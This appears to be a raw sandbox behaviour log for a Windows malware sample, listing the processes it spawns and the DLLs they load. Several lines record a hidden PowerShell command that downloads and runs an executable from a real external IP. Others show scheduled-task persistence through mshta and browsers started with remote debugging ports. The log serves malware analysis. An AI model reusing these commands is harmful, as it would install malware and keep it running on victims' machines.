                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" Jump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" Jump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" "
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeProcess created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeProcess created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                                Source: C:\Windows\System32\mshta.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess created: unknown unknown
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: wsock32.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: mpr.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: iphlpapi.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
